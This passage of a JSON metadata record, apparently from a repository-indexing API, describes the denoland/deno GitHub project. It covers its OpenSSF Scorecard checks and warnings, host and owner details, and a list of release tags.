mini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":